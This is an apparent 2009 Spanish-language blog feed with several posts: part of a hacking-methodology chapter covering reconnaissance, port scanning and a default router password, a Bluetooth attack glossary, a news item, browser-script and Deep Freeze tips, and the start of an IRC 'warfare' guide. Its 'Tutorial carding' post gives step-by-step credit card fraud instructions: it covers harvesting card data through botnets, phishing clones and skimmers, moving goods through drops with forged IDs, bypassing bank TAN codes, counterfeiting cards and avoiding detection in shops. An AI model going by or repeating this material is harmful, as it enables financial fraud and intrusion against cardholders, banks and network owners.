son<br />públicos y pueden ser consultados por cualquier persona. Es análogo a la Sección Amarilla de la guía<br />telefónica, pero referida a los dominios en Internet.<br /><br />Con este tipo de consultas se pueden evitar estafas como las de Banamexnet, haciendo una<br />comprobación para saber si un dominio sospechoso pertenece realmente a la entidad que parece<br />representar. Al consultar un dominio, la información viene dividida en cuatro secciones:<br />Empresa: Lo más relevante resulta la dirección física de la empresa, el contacto técnico y los<br />servidores de nombres. Esto último resulta especialmente atractivo para el hacker.<br />Contacto administrativo: Nombre, correo electrónico, teléfono y fax.<br />Contacto técnico: Este dato también se presenta interesante en caso de ser necesario avisar sobre<br />algún error de seguridad en su página. Aquí se puede consultar su correo electrónico, nombre,<br />teléfono, etc.<br />Contacto de facturación: Igualmente se consultan correo electrónico, nombre, teléfono, etc.<br />Para empresas internacionales cuyo dominio termine en .com o .net, podemos echar mano del<br />servicio whois10 de nic.com (http://www.nic.com/nic_info/whois.htm), donde la información<br />proporcionada viene a ser la misma.<br />Serán muchas las ocasiones en que el buen uso de un buscador nos puede ahorrar mucho tiempo de<br />investigación.<br />Imaginémonos que a partir de nic.es averiguamos el email del administrador o el responsible técnico<br />de la empresa. O, mejor aún, mediante un ataque de ingeniería social averiguamos su dirección<br />personal de hotmail o cualquier otro servidor de correo web. Introducimos su email en el navegador y<br />nos lleva a varias páginas más o menos interesantes. En una de ellas llegamos a descubrir que hace<br />tan solo unos meses, estampó su dirección real en una lista de correo especializada sobre<br />herramientas pidiendo asesoría y presupuestos sobre actualizaciones de routers.<br />Muchos administradores de sistemas se enfrentan casi a diario con nuevo software y tienen que<br />pedir ayuda a especialistas en internet en busca de consejo y compartir experiencias propias. Esto no<br />es raro y resulta incluso frecuente. Lo que a muchos se les pasa, y en esto entra la ignorancia, es<br />que hay que hacerlo de manera anónima. Esta es una de las maneras más limpias y libre de<br />molestias con las que los hackers encuentran información sin tener que sumergirse en manuales o<br />hacer pruebas en decenas de programas, además, en casos así o parecidos, ya tenemos la certeza de<br />que el router es o ha sido vulnerable y que puede existir realmente una forma de atacar. Un router<br />(encaminador, direccionador, enrutador) es un dispositivo que distribuye tráfico entre redes. La<br />decisión sobre a donde enviar los datos se realiza en base a información de nivel de red y tablas de direccionamiento.<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">2.- Escaneo de Puertos</span></span><br /><br />Nos centraremos en el aspecto práctico en el capítulo sobre escaneadores de puertos (página 91).<br />Gracias a distintas técnicas sabremos los puertos que el servidor mantiene abiertos ofreciendo<br />servicios a través de ellos. Cuantos más puertos se encuentren abiertos, más servicios ofrece y más<br />posibilidades de que alguno sea vulnerable. Este paso resulta imprescindible y de gran importancia.<br />Hay que advertir: Un escaneo de puertos indiscriminado hacia una máquina que no nos pertenezca<br />constituye un delito.<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">3.- Identificación de Servicios</span></span><br /><br />La función de un puerto es tener enlazado un servicio o programa que escuche en él y por el que se<br />realicen las conexiones necesarias. En este paso se descubre qué programa hace uso de cada puerto,<br />anotando en conciencia su versión.<br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><br /><span style="font-weight: bold;">4.- Identificación del Sistema</span></span><br /><br />Aunque se puede deducir a partir de la identificación de servicios (existen servicios válidos<br />únicamente para Windows o Unix) se requerirá comprobar en que plataforma y sistema operativo<br />esta trabajando el servidor, pues los datos que ofrecen los servicios pueden estar falseados.<br />Podemos empezar usando la herramienta web netcraft.com, que cuenta con varios servicios. Uno de<br />ellos nos indica el Sistema Operativo y la versión del servidor web, así como los datos del proveedor<br />de Internet donde está alojado. Esto esta muy bien por la información que puede darnos.<br />En esta página hay un servicio llamado “What is this site running” que informa qué software esta<br />usando para su servicio web. Al introducir alguna dirección web aparecerá algo como esto:<br />The site www.xxxxx.com is running Apache/1.3.27 (unix) mod_bwprotect/0.2<br />Mod_log_bytes/1.2 mod_bwlimted/1.0 PHP/4.3.1 frontpage/5.0.2.2510<br />Mod _ssl/2.8.12 OpenSSL/.09.6b on Linux<br />En el apartado más abajo, llamado Netblock owner nos lleva a un link en el que podemos conocer<br />otros sites alojados en el mismo proveedor de caudal de Internet, y propietario del bloque de<br />direcciones IP. Incluso podremos conocer el lugar geográfico donde se encuentra esa computadora.<br />Es posible que netcraft.com solo muestre un escueto:<br />The site www.xxxxx.com is running Apache on Linux<br />Lo que nos indica que el administrador ha hecho que la información sobre las versiones que usa no<br />estén disponibles públicamente.<br />Otro servicio de netcraft es la búsqueda por nombre de dominio. A veces, si buscamos una página<br />sobre seguridad, por ejemplo, en un buscador como Google, nos llevará a miles de lugares distintos y<br />no sabremos por donde empezar. A menudo nos trae páginas que nada tienen que ver con la<br />seguridad, pero que en su texto aparece esa palabra. Buscando por dominio, estaremos buscando<br />entre todas las direcciones que contienen la palabra “seguridad” en su nombre de dominio:<br />seguridadempresarial.org, todoenseguridad.com, etc. Netcraft también aloja las estadísticas de uso<br />de servidores web. En Internet existen básicamente dos programas para servir páginas web: IIS (de<br />pago y de Microsoft), Apache (el más usado, gratuito y lo hay para Linux y Windows).<br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><br /><span style="font-weight: bold;">5.- Descubrir Vulnerabilidades y Verificación</span></span><br /><br />Ya que tenemos las versiones de los distintos sistemas y programas, así como la versión del Sistema<br />operativo, es momento de buscar vulnerabilidades conocidas que afecten a esas versiones (en<br />especifico) de las aplicaciones. Existen listados en la Red que se mantienen al día con las<br />vulnerabilidades y explican en detalle el problema y como solucionarlo. Por ejemplo: securitytracker,<br />en su listado refleja las debilidades de sistemas operativos, programas, routers, etc<br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><br /><span style="font-weight: bold;">6.- Verificación de Aplicaciones</span></span><br /><br />No solo las aplicaciones en sí pueden ser vulnerables o no. Quizá se puedan estar usando versiones<br />parchadas11 a las que no afecte ninguna de las vulnerabilidades conocidas hasta el momento. Pero<br />aún así, puede que sigan siendo vulnerables por la manera en que están dispuestas o configuradas.<br />Un programa en el directorio incorrecto dentro de un servidor web, los permisos no adecuados<br />aplicados a un usuario, todo esto puede derivar en grandes problemas de seguridad que podemos<br />aprovechar, independientemente de que su software se encuentre actualizado.<br />11 Los bugs (errores de programación) y ciertas vulnerabilidades severas pueden a veces solucionarse con un software especial,<br />denominado Patch (Parche), que evita el problema o alivia de algún modo sus efectos.<br />41<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">7.- Comprobación del Router (Ruteador)</span><br /></span><br />El router (ruteador) es un servidor de red que mira las direcciones de la red en los paquetes que<br />recibe antes de decidir si los pasa más adelante. Un router toma decisiones más inteligentes que un<br />puente sobre los datos que pasa adelante. Un puente sólo decide si pasa o no un paquete, pero un<br />router puede escoger el mejor camino a lo largo de la red para que el paquete alcance su dirección<br />de destino. En el contexto TCP/IP, un ruteador es una entrada, una computadora con dos o más<br />adaptadores de red que está ejecutando algún tipo de software de ruteo IP. Cada adaptador se<br />conecta a una red física diferente.<br />Además de dirigir el tráfico, al router se le puede delegar la función de mapear puertos. En el<br />software que lo compone, se han hallado vulnerabilidades en varias ocasiones que permitían el<br />acceso a la computadora que lo usaba para salir al Internet. Uno de los problemas más sencillos de<br />explotar eran las contraseñas por defecto de los routers que la telefónica proporciona a sus clientes.<br />Si dabas con uno en Internet, tan solo requerías teclear adminttd como username y password para<br />reconfigurar el acceso a Internet de la víctima.<br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><br /><span style="font-weight: bold;">8.- Cotejo de los Sistemas Confiables</span></span><br /><br />Aquí se comprueba la seguridad desde el interior de la red hacia los servidores. Sirve para comprobar<br />el nivel de acceso a datos confidenciales que puede obtener un usuario no privilegiado de la red y<br />hasta qué punto puede comprometer un sistema. Para este punto, se necesita tener acceso directo a<br />la red y ponerse en el papel de un usuario con ciertos derechos.<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">9.- Verificación de Firewalls (Cortafuegos)<br /><br /></span></span>Los Firewalls protegen los puertos y deciden quién y cómo debe conectarse a los servicios que ofrece<br />el servidor. Después hablaremos sobre los puertos.<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">10.- Revisión de los Sistemas de Detección de Intrusos (IDS)</span></span><br /><br />Otra de las herramientas básicas cuando se trata la seguridad en la red. Un IDS es un programa con<br />utilerías que vigilan la red en busca de ciertos patrones reconocibles de ataques y se les puede<br />definir el lanzamiento de aplicaciones o distintas acciones al respecto.<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">11.- Comprobación de las Medidas de Contención</span></span><br /><br />Es obligatorio saber cómo administrar de manera óptima los recursos disponibles y conocer quién<br />tiene acceso a qué tipos de sistemas y además, estar preparados para cualquier desastre. Hay que<br />mantener un sistema de respaldos de seguridad y recuperación de datos en caso de accidentes.<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">12.- Contraseñas</span></span><br /><br />Después de todos los pasos anteriores, si se han explotado con éxito y se ha obtenido algún dato, lo<br />ideal sería haber obtenido algún archivo de contraseñas, que, si están cifradas, es necesario<br />descifrar. Si también se obtiene ese dato, podrías abrir todas las puertas del sistema. Más adelante<br />hablaremos de los rompedores de contraseñas y acerca de las contraseñas ensombrecidas.<br /><br /><span style="color: rgb(102, 102, 0);font-size:130%;" ><span style="font-weight: bold;">13.- Indagación de Denegación de Servicio</span></span><br /><br />La Denegación de Servicio (DoS) y Denegación de Servicio Distribuida (DDoS) consisten en realizar<br />peticiones al servidor hasta saturar sus recursos. Un ejemplo de DDoS es un ataque a una página<br />web. Un ejemplo de DoS es inundar el correo de una persona con un millón de e-mails. Más adelante<br />en este documento hablaremos de este tipo de ataques.<br />Nota de Advertencia<br />Es necesario completar todos los pasos para poder sentirse seguro. Haber encontrado un camino<br />alterno para entrar en el sistema no significa que sea el único.<br /><br />Fuente:El sendero del hackerCibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com1tag:blogger.com,1999:blog-6882397234957178715.post-57617819476075134812009-12-07T21:41:00.001+01:002009-12-07T21:42:48.981+01:00BlueHacking - Definiciones y Herramientas<span style="color: red;"><span style="font-size: 10pt; line-height: 1.3em;"><b>BlueJacking</b></span></span><br /><br />Bluejacking es el envio de mensajes sin permiso a traves de dispositivos con Bluetooth como celulares, PDAs, portatiles y algunos PCs, enviando una vCard, una Nota o un Contacto que usualmente contiene un mensaje el campo del nombre a otro dispositivo Bluetooth a traves del protocolo OBEX.<br /><br />Bluetooth tiene un rango muy limitado, usualmente alrededor de 10 metros en algunos celulares, pero en portatiles puede superar los 100 metros con algunos transmisores potentes.<br /><br />El Nombre fue originado por un usuario llamado AJACK, quien estando en un banco, busco algun dispositivo Bluetooth encendido y al encontrar un Nokia 7650, le envio un mensaje diciendo “Compra Sony Ericsson”. El lo llamo bluejacking, y asi se ha hecho desde entonces.<br /><br />Ajack junto con Droll posteriormente desarrollaron una utlidad para Symbin UIQ llamada SMan que llego a ser la primera utilidad de bluejacking para un smartphone. Ya recientemente se desarrollaron aplicaciones para otras plataformas como java, de las cuales podemos nombrar al Mobiluck, el EasyJack, y una hecha por la misma compañía Nokia llamada Sensor.<br /><br />Algunos piensan que el termino bluejacking viene de la palabra Bluetooth y la palabra hijacking. Esto sonaria logico, pero un bluejacker no hace hijack con nada: el o ella unicamente usa una opcion en el envio y el dispositivo recipiente (receptor). Un bluejacker no esta en la capacidad de tomar control de tu telefono o de robar informacion personal. ne Mas bien esta orientado a hacer bromas o molestar a alguien, y tal vez de alli es que viene el termino.<br /><br />El Bluejacking es algo gracioso, porque la persona bluejackeada no sabe lo que esta pasando, y piensa que su telefono esta funcionando mal <img src="http://www.el-hacker.com/foro/Smileys/default/wink.gif" alt="Wink" border="0" />.<br /><br />Usualmente un bluejacker solo envia un mensaje de texto, pero con los telefonos modernos es possible hasta enviar imagines o sonidos tambien.<br /><br />Esto del Bluejacking a sido usado para Tecnicas de marketing en algunos centros comerciales quienes se hacen publicidad a traves de este medio.<br /><br />Pero con el incremento de los dispositivos con soporte bluetooth , algunos de estos dispositivos (especialmente PDAs y alunos moviles con Symbian) se han vuelto vulnerables, desde ataques de virus, hasta el control total del dispositivo a traves de programas Troyanos.<br /><br /><br /><span style="color: red;"><span style="font-size: 10pt; line-height: 1.3em;"><b>BlueSnarfing</b></span></span><br /><br />Bluesnarfing es el robo de informacion de un dispositivo inalambrico a traves de una conexion Bluetooth, ya sea entre telefonos, portatiles o PDAs.<br /><br />Esto permite acceso al calendario, la lista de contactos, correos y mensajes de texto. Bluesnarfing es mucho mas serio en relacion al Bluejacking, pero ambos “explotan” otros dispositivos Bluetooth sin su conocimiento.<br /><br />Cualquier dispositivo que tenga encendido el Bluetooth y este se encuentre en Modo Descubierto (osea que puede ser encontrado por otros dispositivos en el rango) puede ser atacado. Apagando esta opcion puede protegerse de la posibilidad de ser Bluesnarfiado. Siendo esto una invasión de la privacidad, el Bluesnarfing es ilegal en algunos paises.<br /><br />Dentro de este Rango de Herramientas Encontramos al Mismo BT Info (Super Bluetooth Hack), el BT File Manager, el BT Explorer, Miyux y otra gran variedad de utilidades.<br /><br /><br /><span style="color: red;"><span style="font-size: 10pt; line-height: 1.3em;"><b>BlueBugging</b></span></span><br /><br />Alguna gente considera el Bluebugging como una forma de Bluesnarfing. Pero la naturaleza de este es muy diferente.<br /><br />Blue Bugging fue inventado en 2004, mas o menos un año despues de que empezara el Bluesnarfing. Mientras el bluesnarfing se trata de robar cosas o archivos del dispositivo de la victima, el Blue Bugging hace un trabajo diferente.<br /><br />Toma el control del movil de la victima, y por medio de comandos hace lo que el BlueBugger desee (dentro de este rango tenemos al BT Info o Super Bluetooth Hack).<br /><br />Para decirlo en palabras faciles, significa que el bluebugger toma el control de tu telefono, y lo usa para enviar mensajes o para hacer una llamada.<br /><br />Mientras al principio el bluebugging requeria que el bugger(literalmente) usara un dispositivo previamente acomodado, las nuevas herramientas del bluebugging han hecho la mayor parte del trabajo, lo que significa que cualquiera con el conocimiento y la herramienta adecuada puede tomar control de tu telefono.<br /><br />Las posibilidades y consecuencias de esto, estan a la Imaginación.<br /><br /><br /><span style="color: red;"><span style="font-family: Verdana;"><b>Bluetiming o Toothing</b></span></span><br /><br />Podria decirse que es una variante del BlueJacking, la cual se dice, es para promover encuentros del tipo sexual (citas, encuentros y esas cosas) mediante la cual un dispositivo Bluetooth es usado para “descubrir” otros dispositivos bluetooth en el rango, y les envia un mensaje sugestivo, algo asi como: Hablamos ? Donde nos vemos ?.<br /><br />Se crea una red de encuentros furtivos con otros dispositivos bluetooth, generalmente en areas con mucha afluencia de publico como Centros Comerciales y parecidos, la cual no solo es para encuentros y charlas, sino tambien para compartir cosas, lo que a logrado que se desarrollen aplicaciones dentro de la categoría MoSoSo (Software para sociabilidad movil, Mobile Social Software en Ingles.) dentro de las cuales podemos contar el Mobiluck, el Bluejack, y los recientes Chat2u o Bluetooth Messenger. Tambien tenemos aquí al “Sensor” de Nokia.<br /><br /><br /><span style="color: rgb(102, 0, 0);"><span style="font-size: 10pt; line-height: 1.3em;">Fuente: BlueJacking Tools<br />Traducción y Adaptacion by :: Smartgenius ::</span></span>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-57729110348060181232009-12-06T21:25:00.002+01:002009-12-06T21:26:02.133+01:00"Actualizaciones de Windows no ocasionan pantallas negras de la muerte"Una serie de medios informaron la víspera que millones de PC en todo el mundo podían verse afectados por "pantallas negras de la muerte" debido a errores de programación en recientes actualizaciones de Windows. La fuente del informe fue el blog de una desconocida empresa británica de seguridad informática, de nombre Prevx.<br /><br />Prevx se refería en concreto a dos actualizaciones de Windows, KB976098, sobre zonas horarias, y KB915597 para Windows Defender, que según su blog modificaba el registro de Windows, resultando en la pantalla negra. La empresa incluso presentaba un procedimiento para solucionar el problema.<br /><br />La empresa moderó posteriormente sus categóricas afirmaciones iniciales, diciendo que las condiciones que debían concurrir para generar la pantalla negra en Windows eran "espasmódicas" – quizás queriendo decir "esporádicas" y que es imposible reproducirlas de un PC a otro.<br /><br />Luego, en una nueva actualización publicada el 2 de diciembre, Prevx se retracta totalmente.<br /><br />En un comunicado, la empresa dice haber "cooperado con Microsoft", para detectar las causas exactas que generan la pantalla negra. Luego confirma que es una situación conocida desde hace varios años y que luego de pruebas exhaustivas se constata que las actualizaciones de Windows nada tienen que ver con el problema.<br /><br />"Pedimos disculpas a Microsoft por cualquier inconveniente que pueda haber ocasionado nuestro blog".<br /><br />Antes de la aclaración publicada por Prevx, Microsoft había publicado un comunicado donde dice haber investigado la información, y concluido que era "imprecisa".<br /><br />"Hemos realizado una acuciosa investigación, constatando que ninguna de nuestras últimas actualizaciones tiene incidencia alguna con el fenómeno descrito en los informes. La empresa que difundió la información no nos había contactado. Hemos informado a la empresa sobre nuestras conclusiones", escribe Microsoft.<br /><br />Llama la atención que Microsoft no se refiere a Prevx por su nombre, ni siquiera en el blog de seguridad de Technet.<br /><br /><a target="_blank" href="http://www.diarioti.com/gate/n.php?id=25208"> Fuente</a>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-63777918158877996942009-12-05T10:42:00.001+01:002009-12-05T10:43:48.184+01:00Tutorial carding<span style="font-family:Verdana;">La idea del carding consiste en manipulaciones bancarias con fin de obtener un beneficio que es pagado por alguien que no eres tu.<br /> <br /> Para poder practicar el carding nesesitaremos cierto material(datos bancarios, dumps, cc`s etc). <br /><br /> Los datos normalmente se consigen por medios de :<br /><br /> BOTNETS<br /><br /> Una botnet es una red de ordenadores (de 5000++++) infectados por un programa que hace que el ordenador se conecte a <br /><br />un servidor que controla todas las maquinas infectadas. De aqui se pueden sacar Cuentas, Tarjetas, Datos personales etc.<br /><br /> Las formas de hacerlo varian de la creatividad del carder. Pero lo mas usual es cambiar el host file de la victima <br /><br />redireccionando los principales sitios de pagos a un scam<br /><br />*scam : Clon de algun recurso que graba los datos los datos introducidos en los formularios o los envia<br /><br />directamente a su dueno.<br /><br /> De aqui se pueden sacar datos como informacion de tarjetas y cuentas bancarias.<br /><br /> GRABBERS<br /><br /> Los grabbers son maquinas que se quedan con los datos de las bandas magneticas y las guardan a un archivo (DUMP). <br /><br />Tambien se llaman grabbers los aparatos que se utilizan para grabar esos dumps en cintas magneticas. Para sacar dumps con <br /><br />este tipo de aparatillos es de buena costumbre aprovechar lugares de trabajo. Lo unico que hay que hacer es pasar la tarjeta <br /><br />por el lector.<br /><br /><br /> HACKING E-SHOPS.<br /><br />Aqui no hay nada que detallar ya que hay muchisimas tecnicas de hacerlo. Lo que hay que tener en cuenta al elegir<br /><br />un e-shop victima es que ha de aceptar tarjetas de credito sin redireccion a la pasarela de pagos del banco de la tarjeta ya <br /><br />que estos no guardan datos de la tarjeta en su base... Tiene que ser un sitio con formulario estandar para introducir la <br /><br />tarjeta que bi se valida al instante.<br /><br /> <br /> FAKE SHOPS.<br /><br />No tiene que ser Fake shop... la idea es crear una tienda virtual donde se pueda pagar con tarjetas de credito. De<br /><br />ally hay dos salidas. La primera seria realmente hacer envios al comprador. Y la segunda es por alguna razon cancelar su <br /><br />pedido. Mas si antes de cancelar el pedido del todo se pieden datos adicionales como fotocopia del SSN del pasaporte o de la <br /><br />tarjeta mucho mejor!<br /><br /> <br /> COMPRAR MATERIAL<br /><br />Si lo todo lo mencionado antes le parece demasiado dificil, hay una salida facil... pero hay que pagarla... Pueden<br /><br />encontrar material de todo tipo en foros o canales especializados en carding (IRC). no voy a poner enlaces ya que no cuesta <br /><br />nada buscar en google. Si tiene conocimientos de ingles o ruso... MUCHO MAS FACIL). Recomendaria negociar en foros ya que en <br /><br />IRC hay mas probabilidades de engaño)...<br /><br /> <br /><br />Termino recordando que la creatividad de la estafa es infinita. lo unico que hay que hacer pensar unpoco en lo que te<br /><br />has propuesto y de como consegirlo... y despues... hacerlo)<br /><br /> <br /><br /> Hay varias formas del carding. Mas abajo intentare mencionar como funccionan las principales formas.<br /><br /><br /> LAS PRINCIPALES EXPLOTACIONES <br /><br /> Una vez tenemos el material buscamos una manera de aprovecharlo...<br /><br /> Una vez que tengas:<br /><br /> TARJETAS DE CREDITO:<br /><br /> Lo mas comun que se puede hacer con una CC es comprar stuff por internet)...<br /><br /> <br /> los datos mas tipicos que se requieren para pagar con tarjeta son : Cardholdername(nombre del titular), Codigo de <br /><br />seguridad (digitos de la parte trasera de la tarjeta), exp_date(fecha de expiracion) <-- casi siempre. y claro esta el numero<br /><br />de la tarjeta.<br /><br /> Lo ideal para este tipo de compras son sitios que se toman la responsabilidad de retirar el dinero por ellos mismos <br /><br />(ejemplo paypal) al recibir la respuesta 00 (tarjeta valida) y no mediante la pasarela de pagos del banco emisor de la <br /><br />tarjeta. porque en este caso dependiendo del banco se suelen solicitar datos adicionales (como el pin de la tarjeta, el <br /><br />numero de la seguridad social) o directamente mandan sms al numero del titular con un codigo de activacion de la <br /><br />transferencia. Asique apuntad siempre los bin's (bank identification number. las primeras 6 cifras de la tarjeta) de sus <br /><br />tarjetas que les fueron bien.<br /><br /><br /><br /> En pocas palabras, buscar algo que nos guste y pagarlo con la tarjeta. Ahora surgen las preguntas "Donde envio el stuff"?<br /><br /> Los carders profecionales suelen trabajar con personas de otros paises que les recojen los envios(drops), los venden y les <br /><br />envian la mitad del dinero obtenido. Es mala costumbre cardear cosas con las que sabes que al final te quedas tu mismo... ya <br /><br />que si te hacen una visita ya tienen pruebas para encerrarte de 3 a 6 años)....<br /><br /> Otros envian a conocidos de sus amigos con documentacion falsa... hay quien envia sus compras a casas abandonadas y las <br /><br />esperan a la puerta de la casa... si es posible con documentacion falsa tb (un carnet en un idioma desconocido por el <br /><br />"cartero" donde figure el nombre del receptor vale. asique media hora de photoshop y listo).<br /><br /><br /> TRANSFERIR DINERO A CUENTA BANCARIA.<br /><br /> Esto ya es mas avanzado...<br /><br /> Para transferir dinero a una cuenta bancaria hay dos caminos.<br /><br /> 1.) De una cuenta virtual.<br /><br /> 2.) De una cuenta bancaria virtual.<br /><br /> El primer metodo es mas facil pero sacas mas si consiges una transferencia direta de una cuenta bancaria.<br /><br /> Es todo lo mismo que con compras por internet... pero aqui hay que complicarse montando un negocio virtual y poder <br /><br />proporcionar simpre facturas por si las solicitan.<br /><br /> EL donde retirar el dinero? pues lo mismo que con compras de internet. la eleccion es suya.<br /><br />un buen ejemplo de un banco virtual podria ser paypal o moneybookers, no voy a entrar en detalles de como trabajar con<br /><br />estos bancos ya que es todo una teoria... Pero si investigan dentro de nada consegiran hacer sus primeras transferencias)...<br /><br /><br /><br /> El metodo dos consiste en consegir la password del panel de control virtual de una cuenta bancaria real y transferir el <br /><br />dinero a sus drops (leer arriba: drops y el como consegir este tipo de cuentas.)<br /><br />El problema esque los bancos suelen proporcionar al usuario una tarjeta con numeros junto a un codigo(tanes) que sirve<br /><br />de verificacion para hacer una transferencia. <br /><br /><br /> <br /> <br /> Algo tipo :<br /><br /> 1 = 32<br /> 2 = 1b<br /> 3 = ff<br /> 4 = 1f....<br /><br /><br />y al intentar hacer una transferencia el banco le pide los valores de determinados numeros. Solucion : Inject de<br /><br />tanes (modulo para bots que reenvia datos que introduce el titular de la cuenta) o buscar bancos sin este tipo de <br /><br />protecciones.<br /><br /><br /> <br /> Ahora va lo duro))))<br /><br /><br /> REAL CARDING<br /><br /> El real carding consiste en fabricacion de tarjetas de credito. es el metodo mas beneficioso y el mas costoso a la vez... <br /><br />ya que el equipo completo para fabricar tarjetas +o- parecidas a las reales puede llegar a costar hasta 10 mil euros. Pero <br /><br />si lo montas viene lo bueno))<br /><br /> el equipo nesesario es:<br /><br /> Grabber:<br /> Grabador de cintas magneticas. nesesitan uno que pueda grabar como minimo 2 pistas (tracks) ya que la mayoria de las <br /><br />tarjetas visa y mc llevan 2 y rara vez 3 pistas. un aparatito asi cuesta de 500 euros hasta 6000.<br /><br /> Emboster:<br /> Es el aparatito que les da el relieve a las tarjetas. (los numeritos del numero de la tarjeta y del nombre del titular). El <br /><br />aparatito en realidad no es tan caro (nose el precio exacto porque el mio me lo hize yo))) es bastante facil de hacer. yo <br /><br />utilize una plancha y unas plantillas de un mecano de niños <img src="http://www.hackurbano.cl/web/images/smilies/wink.gif" alt="" title="Wink" class="inlineimg" border="0" /><br /><br /><br /> Card printer:<br /><br /> pequeña maquina que imprime en las tarjetas de plastico. (el precio no suele subir a mas de 1000ˆ, pero no vale ahorrar en <br /><br />ese aparato ya que de el depende como van a quedar las tarjetas).<br /><br /><br /> y lo ultimo es una maquinita que pega las cintas magneticas al plastico. este es opcional ya que por ally se venden <br /><br />tarjetas prefabricadas (White card).<br /><br /><br /> Bueno una vez tenemos todo esto consegimos un dump por ally fabricamos unas cuantas tarjetas, copramos un billete de <br /><br />avion a algun pais donde nos gustaria hacer las compras y nos bamos.<br /><br /> Ahora simplemente simplemente pagamos con la tarjeta en caja como si fuera nuestra. <br /><br /> IMPORTANTE:<br /> Es recomendable llevar siempre dinero efectivo cuando sales de compras (para no hacerte el sospechoso en caso de que algo <br /><br />salga mal).<br /><br /> Es importante tambien que las targetas sean de credito i no de debito ya que las de debito siempre piden pin (es dificil <br /><br />pillar un dump con pin ya que estos los usan directamente i no los venden)<br /><br /> En caso de que la tarjeta devuelva el codigo "tarjeta robada" y el vendedor intente quitar la tarjeta NUNCA DEJES QUE TE <br /><br />QUITEN LA TARJETA. bajo cualquier excusa llevatelacontigo. SIEMPRE!<br /><br /><br /> cuando hagas tus compras intenta ser natural i no te preocupes de nada.<br /> recuerda que el pensamiento tiene una fuerza tremenda... no dejes que tus paranoyas te molesten a la hora de hacer <br /><br />$$$ =)<br /><br /><br />Bueno pues nada... aqui acabo...Espero haber dato una buena base. Si tienen alguna o quieren que les explique algo<br /><br />mas detalladamente un pm<br />No respondo a gente poco seria, ignorante y menor de edad.<br /><br /> Tutorial escrito por SPQR </span>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-21527909447046398672009-12-02T12:02:00.004+01:002009-12-02T12:12:34.787+01:00ScriptEn este post explicare que son y para que sirven.<br /><br />El término Script puede referirse a:<br /><br /> * En informática, un script es un guión o conjunto de instrucciones. Permiten la automatización de tareas creando pequeñas utilidades. Es muy utilizado para la administración de sistemas UNIX. Son ejecutados por un intérprete de línea de órdenes y usualmente son archivos de texto. También un script puede considerarse una alteración o acción a una determinada plataforma.<br /><br />fuente :wikipedia<br /><br />Sabiendo esto como encuentro y utilizo los scripts.<br /><br />Se necesita el mozilla firefox y en complementos añades el <span style="color: rgb(51, 0, 51);font-size:130%;" >Grasemonkey</span> esto te facilitara la entrada de nuevos scripts, los hay para hacerte todo mas facil y los hay para hackear.Para no estar buscandolos manualmente por la red, existe otro programa llamado <span style="font-weight: bold;"><span style="font-size:130%;">Greasefire</span> </span>una vez que lo descarges el pequeño mono aparecerá en la barra de estado de <strong>FireFox</strong>; si hay <strong>scripts</strong> para el sitio, este mono se cambiará a color rojo, y al hacer clic en el ícono aparecerá la cantidad de scripts disponibles, y al hacer clic sobre esa cantidad se abrirá una ventana con más información de esos scripts. ¿Nada mal eh? mejor que estar buscando y buscando por la red.<br /><br />Tambien puedes añadir tus scrpits creados busca en la google y encontraras muchosCibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-36918014623125099182009-12-01T12:51:00.003+01:002009-12-01T12:55:07.045+01:00Congela tu Disco DuroLos propietarios de Cybercafes y los usuarios con equipos compartidos están siempre buscando formas de mantener sus equipos funcionando en perfecto estado, esto desde luego porque no hay nada peor para la clientela de un Cafe Internet que encontrar equipos con virus, desconfigurados, que se traban constantemente o que hay que instalarles software que no tienen en dado momento.<br /><br />La otra razón importante es el hecho de que son los mismos usuarios los que tienden a modificar configuraciones, grabar o eliminar archivos o bien almacenar información personal que no te sirve más que para ocupar espacio valioso en tus discos. Sin mencionar las amenazas provocadas por virus o programas que instalan y que hacen mas lentos tus equipos.<br /><br />Así que hoy te compartimos una solución que seguramente te será de gran utilidad y es congelar tus discos duros. El proceso de congelamiento se refiere a la utilización de un programa que te permite guardar la configuración básica inicial de un equipo y restaurarla en cualquier momento (digamos todos los días por la noche o bien antes de abrir el negocio por la mañana).<br /><br />La herramienta se llama <a href="http://deep-freeze.programas-gratis.net/"><span style="color: rgb(153, 0, 0);">DEEP FREEZE</span></a> y es un programa que puedes descargar y probar en este link. El programa te permite grabar una configuración inicial y regresar a ella en el momento que lo desees.<br /><br /><br />Finalmente sólo recuerda que debes aclarar a tus clientes colocando algún cartel que diga algo como "No respondemos por la información que guardas en los equipos" o "Los equipos son limpiados y restaurados diariamente, guarda tu información en tu usb".Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-39043643521876947262009-11-30T12:50:00.000+01:002009-11-30T13:05:32.081+01:00Tácticas de guerra en el IRC<span style="color: rgb(0, 0, 0);"><span style="color: rgb(153, 0, 0);font-size:130%;" ><span style="color: rgb(153, 0, 0);">1.- Introducción.</span></span><br /><br />La guerra en el IRC es, por desgracia, algo bastante común. Conviene, a lo menos, estar informado de las distintas técnicas que se suelen usar para "luchar", aunque sea simplemente para detectar que te están atacando y saber cómo lo están haciendo. No es mi intención profundizar demasiado en el tema aunque intentaré detallar algunos puntos que considere convenientes.<br /><br />Todo lo que aquí se hable es extensible en general a cualquier red IRC. No obstante en algunos casos muy particulares me referiré a la red IRC hispana ("*.irc-hispano.org"). Ni que decir tiene que 